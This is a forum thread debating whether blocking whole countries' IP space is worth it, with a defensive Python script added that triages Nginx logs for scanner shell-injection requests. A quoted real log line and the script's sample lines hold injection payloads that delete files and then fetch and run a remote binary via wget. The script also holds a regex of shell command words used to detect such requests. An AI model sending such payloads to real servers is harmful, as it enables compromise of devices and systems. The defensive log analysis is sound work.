> Drop Russia, China, and even Brazil (whose network ops never ever ever respond to spam reports).

I don't mean to be presumptuous, but what is the benefit of this? Do you spend all day stressing when you see

    112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"
in your Nginx logs? Actual financial fraud occurs using US residential proxies. Automated scanning occurs in those countries because they have a bunch of cheap insecure routers and IoT devices. Writing angry abuse reports all day is misdirected because the scanning device is probably some hacked Hikvision camera, not a master hacker. You'd be better off trying to get the C2 shut down.
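The comment above draws a distinction between commodity scanner noise in Nginx logs and traffic that actually deserves attention. As an added illustration (not code from anyone in the thread), here is a small triage pass over combined-format log lines: it parses each line, flags request paths that carry a shell command chain (the shape of the `/shell?cd+/tmp;...;wget+...` line quoted above), separates scanner hits that returned 4xx from ones the server actually answered with 2xx/3xx, and collects the hosts the payloads try to fetch a second stage from, which is the information an abuse report about the hosting of that dropper needs. The log lines and the IP addresses in them are constructed for this example from RFC 5737 documentation ranges.

```python
import re
import urllib.parse
from collections import Counter

# Nginx "combined" log format:
#   client ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Command words that commodity IoT/router scanners chain into a GET request.
CMD_WORD_RE = re.compile(r'\b(?:cd|rm|wget|curl|sh|chmod|tftp|busybox)\b')
# Host (without port) that a wget/curl in the payload would download from.
FETCH_HOST_RE = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*(?:https?://)?([A-Za-z0-9.\-]+)')

# Constructed sample log lines; 192.0.2.x / 198.51.100.x / 203.0.113.x are documentation ranges.
LOG_LINES = """\
192.0.2.10 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+198.51.100.77/bot.sh;sh+/tmp/bot.sh HTTP/1.1" 404 153 "-" "Hello, world"
192.0.2.10 - - [14/Feb/2023:00:00:19 +0000] "GET /cgi-bin/status?;wget+http://198.51.100.77:8080/x HTTP/1.1" 404 153 "-" "Hello, world"
203.0.113.5 - - [14/Feb/2023:00:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Feb/2023:00:02:40 +0000] "GET /search?q=rm+the+tmp+file HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [14/Feb/2023:00:03:11 +0000] "GET /setup.cgi?cmd=`wget+198.51.100.78/a` HTTP/1.1" 200 12 "-" "curl/7.88"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def looks_like_shell_injection(path):
    """True when the decoded path carries both a command separator and a shell command word.

    Requiring both keeps ordinary search queries such as '/search?q=rm+the+tmp+file'
    from being flagged just because they contain a word that is also a command.
    """
    decoded = urllib.parse.unquote_plus(path)  # '+' -> space, %xx -> byte
    has_chain = any(tok in decoded for tok in (';', '|', '&&', '`'))
    return has_chain and CMD_WORD_RE.search(decoded) is not None


def classify(entry):
    """'scanner-noise': exploit-shaped request the server rejected (4xx).
    'scanner-hit':   exploit-shaped request the server answered (2xx/3xx), worth a look.
    'other':         everything else."""
    if not looks_like_shell_injection(entry['path']):
        return 'other'
    return 'scanner-noise' if entry['status'].startswith('4') else 'scanner-hit'


def fetch_hosts(path):
    """Hosts the injected command chain tries to download a second stage from."""
    decoded = urllib.parse.unquote_plus(path)
    return FETCH_HOST_RE.findall(decoded)


def triage(lines):
    """Summarise a batch of log lines for a quick defender's read."""
    by_class = Counter()
    noise_by_ip = Counter()
    hosts = Counter()
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        by_class[kind] += 1
        if kind == 'scanner-noise':
            noise_by_ip[entry['ip']] += 1
        if kind != 'other':
            hosts.update(fetch_hosts(entry['path']))
        if kind == 'scanner-hit':
            hits.append(entry)
    return {'by_class': by_class, 'noise_by_ip': noise_by_ip,
            'fetch_hosts': hosts, 'hits': hits}


if __name__ == '__main__':
    report = triage(LOG_LINES.splitlines())
    print('classes:', dict(report['by_class']))
    print('noise per source IP:', dict(report['noise_by_ip']))
    print('second-stage hosts seen in payloads:', dict(report['fetch_hosts']))
    for h in report['hits']:
        print('answered exploit-shaped request from', h['ip'], '->', h['path'])
```

The `scanner-noise` bucket is the part that is safe to ignore or rate-limit; the `scanner-hit` bucket is the one that says something on the server actually responded to an exploit-shaped request and should be checked. The `fetch_hosts` counter is where the payload-hosting addresses accumulate, which is the thing to report rather than the scanning camera.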

So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

Completely untrue.

So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

And spam has 0 cost, right?

Read the equation again. 0 downside, endless upside.

> So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

If you're referring to banking fraud I'm pretty sure the answer is mostly yes. Maybe sometimes fraudsters are lazy.

> So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

It does, I'm just saying it's almost entirely automated scans and bruteforce using default password combinations and several year old CVEs. If you are vulnerable to those you have bigger problems.

> And spam has 0 cost, right?

Unless you are running some ancient configuration, the cost is lower than the amount of engineering work and mental capacity you appear to be devoting to stopping it.

I'm not saying you shouldn't make the tradeoff or that it's wrong to do it, just that the amount of security you think you are gaining from it is not as high as you think.

I love it. Statements peppered with "almost" and "mostly". How if you are updated, well then you're golden, 'cause mostly it's old CVEs.

Which ignores that even 0.001% of traffic is a load of more skilled bad actors; this IP space is rotten to the core.

Throughout, I have stated 0 downside, all upside. Even one dedicated hacker gone is a plus in this scenario. Even showing yourself to be actively, aggressively defending is a plus, if comparables are less guarded.

And you're bracketing the use case, others and I have been speaking of the generic. Many run MTAs, so cutting down on inbound spam and malware, pre-filtering is a plus.

Canning all this address space is a never lose, always win, plus plus plus.

Save yourself the grief. Hot potato it.